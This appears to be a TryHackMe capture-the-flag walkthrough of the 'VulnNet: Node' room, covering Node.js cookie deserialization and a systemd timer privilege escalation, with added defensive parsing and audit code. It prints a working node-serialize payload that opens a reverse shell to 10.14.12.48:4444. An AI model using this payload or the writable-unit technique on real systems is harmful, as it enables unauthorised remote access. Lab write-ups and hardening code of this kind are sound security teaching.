VulnNet: Node TryHackMe WalkThrough
After the previous breach, VulnNet Entertainment states it won't happen again. Can you prove they're wrong?
VulnNet Entertainment has moved its infrastructure and now they’re confident that no breach will happen again. You’re tasked to prove otherwise and penetrate their network.
- Difficulty: Easy
- Web Language: JavaScript
Enumeration
More Enumeration…
Manual Enumeration
- No sensitive data in the source code.
Let's open Burp and capture the request.
Looking at the cookie, I can see that the value of the session cookie is a URL-encoded base64 value.
eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D
{"username":"Guest","isGuest":true,"encoding": "utf-8"}
So the only realistic way into the machine is through some RCE, since merely tampering with the cookie values may not give anything.
Let’s Learn & Hack
- Point to note: the application returns an unserialize error, so the cookie is being deserialized server-side.
Let's use the payload from: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs
Used payload: {"username":"_$$ND_FUNC$$_function (){(function(){var net = require('net'),cp = require('child_process'),sh = cp.spawn('/bin/sh', []);var client = new net.Socket();client.connect(4444, '10.14.12.48', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});})();}()"}
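For the defending side, here is an added example (my own code, not part of the walkthrough or the VulnNet application) showing how the session cookie decodes, as described above, and what a hardened replacement for a serialization-based session parser looks like: URL-decode, base64-decode, refuse anything carrying the `_$$ND_FUNC$$_` function marker the payload depends on, then use plain `JSON.parse` with a strict shape check. The `parseSession` name and the session shape (`username`, `isGuest`) are assumptions; the Guest cookie is the one captured on the page and the marker cookie is constructed here with a harmless body.

```javascript
// Added example, not the walkthrough's or the target application's code.
// Hardened session-cookie handling for a Node.js app that previously ran
// unserialize() on a URL-encoded base64 cookie (assumed from the unserialize error).

// Marker that node-serialize-style libraries treat as "this string is a function".
const FUNC_MARKER = '_$$ND_FUNC$$_';

// The Guest cookie captured in the walkthrough (page data, not constructed).
const GUEST_COOKIE =
  'eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D';

// Constructed sample: same encoding, but the username carries a function marker
// with a harmless body, standing in for the payload shape seen above.
const MARKER_COOKIE = encodeURIComponent(
  Buffer.from('{"username":"_$$ND_FUNC$$_function (){ return 1 }()","isGuest":false}')
    .toString('base64')
);

// Step 1: reverse the encoding exactly as the walkthrough describes (URL-decode, then base64).
function decodeSessionCookie(raw) {
  return Buffer.from(decodeURIComponent(raw), 'base64').toString('utf8');
}

// Step 2: a cheap detection signal; a legitimate session never contains this marker.
function containsFunctionMarker(text) {
  return text.includes(FUNC_MARKER);
}

// Step 3: parse with JSON.parse (which never executes code) and validate the shape.
// Returns { ok: true, session } or { ok: false, reason } so callers can log rejections.
function parseSession(raw) {
  let text;
  try {
    text = decodeSessionCookie(raw);
  } catch (e) {
    return { ok: false, reason: 'undecodable cookie' };
  }
  if (containsFunctionMarker(text)) {
    return { ok: false, reason: 'serialized function marker rejected' };
  }
  let obj;
  try {
    obj = JSON.parse(text);
  } catch (e) {
    return { ok: false, reason: 'invalid JSON' };
  }
  if (typeof obj !== 'object' || obj === null || Array.isArray(obj)) {
    return { ok: false, reason: 'session is not an object' };
  }
  if (typeof obj.username !== 'string' || typeof obj.isGuest !== 'boolean') {
    return { ok: false, reason: 'unexpected session shape' };
  }
  // Copy only the fields we expect; anything extra (like "encoding") is dropped.
  return { ok: true, session: { username: obj.username, isGuest: obj.isGuest } };
}

// Demo run.
console.log(decodeSessionCookie(GUEST_COOKIE));
console.log(parseSession(GUEST_COOKIE));
console.log(parseSession(MARKER_COOKIE));
```

The marker check is defence in depth and a useful detection signal for logs; the actual fix is that `JSON.parse` replaces `unserialize`, so a function body in the cookie can never be evaluated regardless of whether the marker check fires.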
Got a reverse shell as www, then moved laterally to the next user.
Privilege Escalation
Change the .timer and .service files to get a reverse shell.
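From the hardening side, an added example (my own script, not from the walkthrough): an audit that finds the two systemd misconfigurations that make the step above possible, unit files writable by non-root users and units whose `ExecStart` target is a writable script. The directory and unit names are constructed in a temporary directory for the demo; on a real host you would point it at `/etc/systemd/system`.

```shell
#!/bin/sh
# Added example, not part of the walkthrough. Audits a directory of systemd units
# for group/other-writable .service/.timer files and for services whose ExecStart
# target is group/other-writable. Uses GNU find's -perm /MODE (any of the bits).

# find_writable_units DIR: print .service/.timer files under DIR that group or
# other can write to (mode has any of the 022 bits).
find_writable_units() {
  find "$1" -type f \( -name '*.service' -o -name '*.timer' \) -perm /022 2>/dev/null | sort
}

# find_writable_exec_targets DIR: for each .service under DIR, print
# "unit -> target" when the ExecStart program is group/other-writable.
find_writable_exec_targets() {
  for unit in $(find "$1" -type f -name '*.service' 2>/dev/null | sort); do
    # Strip "ExecStart=" and systemd's optional prefix chars (-, @, +, !); keep the path.
    sed -n 's/^ExecStart=[-@+!]*\([^ ]*\).*/\1/p' "$unit" | while read -r target; do
      if [ -f "$target" ] && [ -n "$(find "$target" -perm /022 2>/dev/null)" ]; then
        echo "$unit -> $target"
      fi
    done
  done
}

# Constructed demo directory (not a real system path): one safe unit, one
# writable timer, and a root-looking service that runs a world-writable script.
demo_dir=$(mktemp -d)
printf '[Service]\nExecStart=/bin/true\n' > "$demo_dir/safe.service"
printf '[Timer]\nOnBootSec=1min\n' > "$demo_dir/loose.timer"
printf '#!/bin/sh\necho job\n' > "$demo_dir/job.sh"
printf '[Service]\nExecStart=%s/job.sh\n' "$demo_dir" > "$demo_dir/cron.service"
chmod 644 "$demo_dir/safe.service" "$demo_dir/cron.service"
chmod 666 "$demo_dir/loose.timer"
chmod 777 "$demo_dir/job.sh"

echo "writable unit files:"
find_writable_units "$demo_dir"
echo "units executing writable targets:"
find_writable_exec_targets "$demo_dir"
```

Either finding means a low-privileged user can change what a root-run timer or service executes; the fix is root ownership and mode 644 on the unit files and 755 (or stricter) on every `ExecStart` target.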